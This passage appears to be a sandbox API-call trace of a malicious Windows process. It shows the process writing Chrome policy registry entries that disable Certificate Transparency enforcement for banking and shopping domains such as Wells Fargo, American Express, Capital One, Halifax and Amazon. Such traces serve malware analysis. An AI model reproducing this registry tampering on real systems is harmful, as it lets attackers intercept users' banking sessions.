	[0191.583] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.583] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.583] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.583] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.583] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.583] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x39c) returned 0x0
	[0191.583] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3a4, lpdwDisposition=0x0) returned 0x0
	[0191.583] RegSetValueExA (in: hKey=0x3a4, lpValueName="77", Reserved=0x0, dwType=0x1, lpData="connect.secure.wellsfargo.com", cbData=0x1d | out: lpData="connect.secure.wellsfargo.com") returned 0x0
	[0191.584] RegCloseKey (hKey=0x3a4) returned 0x0
	[0191.584] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.584] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.584] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.584] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.584] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.584] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3a0) returned 0x0
	[0191.585] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3a8, lpdwDisposition=0x0) returned 0x0
	[0191.585] RegSetValueExA (in: hKey=0x3a8, lpValueName="78", Reserved=0x0, dwType=0x1, lpData="www.wellsfargo.com", cbData=0x12 | out: lpData="www.wellsfargo.com") returned 0x0
	[0191.586] RegCloseKey (hKey=0x3a8) returned 0x0
	[0191.586] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3a4) returned 0x0
	[0191.586] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3ac, lpdwDisposition=0x0) returned 0x0
	[0191.586] RegSetValueExA (in: hKey=0x3ac, lpValueName="79", Reserved=0x0, dwType=0x1, lpData="wellsfargo.com", cbData=0xe | out: lpData="wellsfargo.com") returned 0x0
	[0191.587] RegCloseKey (hKey=0x3ac) returned 0x0
	[0191.587] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.587] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.587] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.587] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.587] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.587] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3a8) returned 0x0
	[0191.587] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3b0, lpdwDisposition=0x0) returned 0x0
	[0191.587] RegSetValueExA (in: hKey=0x3b0, lpValueName="80", Reserved=0x0, dwType=0x1, lpData="global.americanexpress.com", cbData=0x1a | out: lpData="global.americanexpress.com") returned 0x0
	[0191.588] RegCloseKey (hKey=0x3b0) returned 0x0
	[0191.588] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.588] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.588] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.588] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.588] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.588] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3ac) returned 0x0
	[0191.588] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3b4, lpdwDisposition=0x0) returned 0x0
	[0191.588] RegSetValueExA (in: hKey=0x3b4, lpValueName="81", Reserved=0x0, dwType=0x1, lpData="www.americanexpress.com", cbData=0x17 | out: lpData="www.americanexpress.com") returned 0x0
	[0191.589] RegCloseKey (hKey=0x3b4) returned 0x0
	[0191.589] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3b0) returned 0x0
	[0191.589] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3b8, lpdwDisposition=0x0) returned 0x0
	[0191.589] RegSetValueExA (in: hKey=0x3b8, lpValueName="82", Reserved=0x0, dwType=0x1, lpData="americanexpress.com", cbData=0x13 | out: lpData="americanexpress.com") returned 0x0
	[0191.590] RegCloseKey (hKey=0x3b8) returned 0x0
	[0191.590] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.591] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.591] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.591] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.591] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.591] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3b4) returned 0x0
	[0191.591] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3bc, lpdwDisposition=0x0) returned 0x0
	[0191.591] RegSetValueExA (in: hKey=0x3bc, lpValueName="83", Reserved=0x0, dwType=0x1, lpData="online.americanexpress.com", cbData=0x1a | out: lpData="online.americanexpress.com") returned 0x0
	[0191.592] RegCloseKey (hKey=0x3bc) returned 0x0
	[0191.592] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.592] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.592] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.592] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.592] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.592] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3b8) returned 0x0
	[0191.592] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3c0, lpdwDisposition=0x0) returned 0x0
	[0191.592] RegSetValueExA (in: hKey=0x3c0, lpValueName="84", Reserved=0x0, dwType=0x1, lpData="us.etrade.com", cbData=0xd | out: lpData="us.etrade.com") returned 0x0
	[0191.593] RegCloseKey (hKey=0x3c0) returned 0x0
	[0191.593] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.593] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.593] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.593] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.593] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.593] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3bc) returned 0x0
	[0191.593] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3c4, lpdwDisposition=0x0) returned 0x0
	[0191.593] RegSetValueExA (in: hKey=0x3c4, lpValueName="85", Reserved=0x0, dwType=0x1, lpData="www.onlinebanking.pnc.com", cbData=0x19 | out: lpData="www.onlinebanking.pnc.com") returned 0x0
	[0191.594] RegCloseKey (hKey=0x3c4) returned 0x0
	[0191.594] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3c0) returned 0x0
	[0191.594] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3c8, lpdwDisposition=0x0) returned 0x0
	[0191.594] RegSetValueExA (in: hKey=0x3c8, lpValueName="86", Reserved=0x0, dwType=0x1, lpData="onlinebanking.pnc.com", cbData=0x15 | out: lpData="onlinebanking.pnc.com") returned 0x0
	[0191.595] RegCloseKey (hKey=0x3c8) returned 0x0
	[0191.595] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.595] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.595] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.595] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.595] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.595] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3c4) returned 0x0
	[0191.596] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3cc, lpdwDisposition=0x0) returned 0x0
	[0191.596] RegSetValueExA (in: hKey=0x3cc, lpValueName="87", Reserved=0x0, dwType=0x1, lpData="www.capitalone.com", cbData=0x12 | out: lpData="www.capitalone.com") returned 0x0
	[0191.596] RegCloseKey (hKey=0x3cc) returned 0x0
	[0191.596] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3c8) returned 0x0
	[0191.597] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3d0, lpdwDisposition=0x0) returned 0x0
	[0191.597] RegSetValueExA (in: hKey=0x3d0, lpValueName="88", Reserved=0x0, dwType=0x1, lpData="capitalone.com", cbData=0xe | out: lpData="capitalone.com") returned 0x0
	[0191.598] RegCloseKey (hKey=0x3d0) returned 0x0
	[0191.598] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.598] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.598] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.598] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.598] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.598] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3cc) returned 0x0
	[0191.598] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3d4, lpdwDisposition=0x0) returned 0x0
	[0191.598] RegSetValueExA (in: hKey=0x3d4, lpValueName="89", Reserved=0x0, dwType=0x1, lpData="verified.capitalone.com", cbData=0x17 | out: lpData="verified.capitalone.com") returned 0x0
	[0191.599] RegCloseKey (hKey=0x3d4) returned 0x0
	[0191.599] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.599] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.599] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.599] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.599] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.599] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3d0) returned 0x0
	[0191.599] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3d8, lpdwDisposition=0x0) returned 0x0
	[0191.599] RegSetValueExA (in: hKey=0x3d8, lpValueName="90", Reserved=0x0, dwType=0x1, lpData="secure.accurint.com", cbData=0x13 | out: lpData="secure.accurint.com") returned 0x0
	[0191.601] RegCloseKey (hKey=0x3d8) returned 0x0
	[0191.602] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x118bac0
	[0191.602] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118bac0 | out: hHeap=0x260000) returned 1
	[0191.602] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118cdd8 | out: hHeap=0x260000) returned 1
	[0191.602] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x118cdd8
	[0191.602] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118cdd8 | out: hHeap=0x260000) returned 1
	[0191.602] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3d4) returned 0x0
	[0191.602] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3dc, lpdwDisposition=0x0) returned 0x0
	[0191.602] RegSetValueExA (in: hKey=0x3dc, lpValueName="91", Reserved=0x0, dwType=0x1, lpData="secure.halifax-online.co.uk", cbData=0x1b | out: lpData="secure.halifax-online.co.uk") returned 0x0
	[0191.603] RegCloseKey (hKey=0x3dc) returned 0x0
	[0191.603] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.603] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.603] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.603] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.603] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.603] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3d8) returned 0x0
	[0191.603] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3e0, lpdwDisposition=0x0) returned 0x0
	[0191.604] RegSetValueExA (in: hKey=0x3e0, lpValueName="92", Reserved=0x0, dwType=0x1, lpData="www.halifax-online.co.uk", cbData=0x18 | out: lpData="www.halifax-online.co.uk") returned 0x0
	[0191.604] RegCloseKey (hKey=0x3e0) returned 0x0
	[0191.605] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3dc) returned 0x0
	[0191.605] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3e4, lpdwDisposition=0x0) returned 0x0
	[0191.605] RegSetValueExA (in: hKey=0x3e4, lpValueName="93", Reserved=0x0, dwType=0x1, lpData="halifax-online.co.uk", cbData=0x14 | out: lpData="halifax-online.co.uk") returned 0x0
	[0191.606] RegCloseKey (hKey=0x3e4) returned 0x0
	[0191.606] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.606] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.606] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.606] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.606] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.606] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3e0) returned 0x0
	[0191.606] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3e8, lpdwDisposition=0x0) returned 0x0
	[0191.606] RegSetValueExA (in: hKey=0x3e8, lpValueName="94", Reserved=0x0, dwType=0x1, lpData="www.amazon.ca", cbData=0xd | out: lpData="www.amazon.ca") returned 0x0
	[0191.607] RegCloseKey (hKey=0x3e8) returned 0x0
	[0191.607] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3e4) returned 0x0
	[0191.607] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3ec, lpdwDisposition=0x0) returned 0x0
	[0191.607] RegSetValueExA (in: hKey=0x3ec, lpValueName="95", Reserved=0x0, dwType=0x1, lpData="amazon.ca", cbData=0x9 | out: lpData="amazon.ca") returned 0x0
	[0191.608] RegCloseKey (hKey=0x3ec) returned 0x0
	[0191.608] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3e8) returned 0x0
	[0191.608] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3f0, lpdwDisposition=0x0) returned 0x0
	[0191.608] RegSetValueExA (in: hKey=0x3f0, lpValueName="96", Reserved=0x0, dwType=0x1, lpData="www.amazon.de", cbData=0xd | out: lpData="www.amazon.de") returned 0x0
	[0191.609] RegCloseKey (hKey=0x3f0) returned 0x0
	[0191.609] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3ec) returned 0x0
	[0191.609] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3f4, lpdwDisposition=0x0) returned 0x0
	[0191.609] RegSetValueExA (in: hKey=0x3f4, lpValueName="97", Reserved=0x0, dwType=0x1, lpData="amazon.de", cbData=0x9 | out: lpData="amazon.de") returned 0x0
	[0191.610] RegCloseKey (hKey=0x3f4) returned 0x0
	[0191.610] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0191.610] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0191.610] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.610] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.610] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.610] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3f0) returned 0x0
	[0191.610] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3f8, lpdwDisposition=0x0) returned 0x0
	[0191.610] RegSetValueExA (in: hKey=0x3f8, lpValueName="98", Reserved=0x0, dwType=0x1, lpData="www.amazon.co.uk", cbData=0x10 | out: lpData="www.amazon.co.uk") returned 0x0
	[0191.611] RegCloseKey (hKey=0x3f8) returned 0x0
	[0191.611] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x3f4) returned 0x0
	[0191.611] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x3fc, lpdwDisposition=0x0) returned 0x0
	[0191.611] RegSetValueExA (in: hKey=0x3fc, lpValueName="99", Reserved=0x0, dwType=0x1, lpData="amazon.co.uk", cbData=0xc | out: lpData="amazon.co.uk") returned 0x0
	[0191.612] RegCloseKey (hKey=0x3fc) returned 0x0
	[0191.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x118bac0
